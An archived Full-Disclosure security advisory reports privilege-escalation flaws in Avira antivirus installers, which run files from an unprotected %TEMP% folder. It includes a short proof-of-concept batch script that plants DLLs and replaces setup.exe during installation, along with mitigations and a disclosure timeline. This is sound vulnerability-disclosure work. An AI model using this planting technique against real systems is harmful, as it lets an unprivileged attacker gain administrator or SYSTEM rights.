lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <6D2934FA3A9D42C9AA678B9D6AAADDBD@W340>
Date: Mon, 29 Aug 2016 15:04:13 +0200
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <bugtraq@...urityfocus.com>
Cc: fulldisclosure@...lists.org
Subject: [FD] Executable installers are vulnerable^WEVIL (case 40): Aviras'
	full package installers allow escalation of privilege

Hi @ll,

Avira's free antivirus full package executable installers,
avira_antivirus_en-us.exe, avira_antivirus_de-de.exe etc.,
available from
<https://www.avira.com/en/download/product/avira-free-antivirus>,
<https://www.avira.com/de/download/product/avira-free-antivirus>
etc., have multiple vulnerabilities:


1. the full package executable installers (really: self-
   extracting RAR archives) extract their payload (the real
   installer) into the directory "%TEMP%\RarSFX0\"

This directory is NOT protected against tampering, i.e. the
extracted payload can be replaced by an unprivileged attacker
who has access to the respective user account, or by malware
already running under this user account.


2. after extraction the self-extractor starts the unpacked
   "%TEMP%\RarSFX0\presetup.exe" ELEVATED, eventually
   displaying an UAC prompt.

An unprivileged attacker who modified "%TEMP%\RarSFX0\presetup.exe"
between extraction and execution can trick the user to start a
rogue program with administrative privileges.


3. "%TEMP%\RarSFX0\presetup.exe" loads multiple (system) DLLs
   from its application directory "%TEMP%\RarSFX0\", and starts
   several programs, for example "%TEMP%\RarSFX0\setup.exe".

All these DLLs and programs are executed with administrative
privileges too; an unprivileged attacker who (re)placed these
files in "%TEMP%\RarSFX0\" gains escalation of privilege to
"Administrator".


4. "%TEMP%\RarSFX0\setup.exe" installs several Windows services
   which run under the SYSTEM account.

An unprivileged attacker who replaced the service executables in
"%TEMP%\RarSFX0\" gains escalation of privilege to "SYSTEM".


Proof of concept:
~~~~~~~~~~~~~~~~~

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>
   and <http://home.arcor.de/skanthak/download/SENTINEL.EXE>
   and save them in your "Downloads" directory;

2. create the following batch script in an arbitrary directory:

--- POC.CMD ---
:WAIT_DLL
@If Not Exist "%TEMP%\RarSFX0" Goto :WAIT_DLL

For %%! In (UXTheme Version DWMAPI) Do @Copy "%USERPROFILE%\Downloads\SENTINEL.DLL" "%TEMP%\RarSFX0\%%!.DLL"

:WAIT_EXE
@If Not Exist "%TEMP%\RarSFX0\setup.exe" Goto :WAIT_EXE

Copy "%USERPROFILE%\Downloads\SENTINEL.EXE" "%TEMP%\RarSFX0\setup.exe"
--- EOF ---

3. download "avira_antivirus_en-us.exe" and save it in your
   "Downloads" directory;

4. start the batch script POC.CMD;

5. start the downloaded "avira_antivirus_en-us.exe" and notice
   the message boxes displayed from the DLLs and EXE placed in
   "%TEMP%\RarSFX0\" by POC.CMD

PWNED!


Mitigations:
~~~~~~~~~~~~

* Don't use executable installers! NEVER!

* Don't use crapware which runs executables from unsafe
  directories like %TEMP%!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of "%TEMP%"; use
  <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to
  decode it to "deny execution of files in this directory for
  everyone, inheritable to all files in all subdirectories".


stay tuned
Stefan Kanthak


PS: of course Avira's anti-virus has some more beginner's errors:
    outdated and vulnerable 3rd-party libraries!

    - libcurl.dll 7.39.0
      the current version is 7.50.1, with MULTIPLE fixed vulnerabilties;
      see <https://curl.haxx.se/docs/vulnerabilities.html>

    - ssleay32.dll and libeay32.dll 1.0.2.5 from OpenSSL 1.0.2e
      the current version is 1.0.2h, with MULTIPLE fixed vulnerabilities;
      see <https://openssl.org/news/vulnerabilities.html>


Timeline:
~~~~~~~~~

2016-07-15    vulnerability report sent to vendor

              NO RESPONSE, not even an acknowledgement of receipt

2016-08-29    report published

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ